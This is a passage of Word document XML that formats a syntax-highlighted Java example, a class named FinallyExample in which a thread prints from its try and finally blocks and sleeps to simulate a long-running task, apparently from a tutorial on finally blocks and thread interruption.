        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FinallyExample</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F38104" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A92F53" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thread </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(()</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D896ED3" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D6F2A" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside try block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E8847" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF0CD1" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2BA609" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Inside finally block"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D87B4" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulating long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BD576" w14:textId="77777777"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2112563"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6D56">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
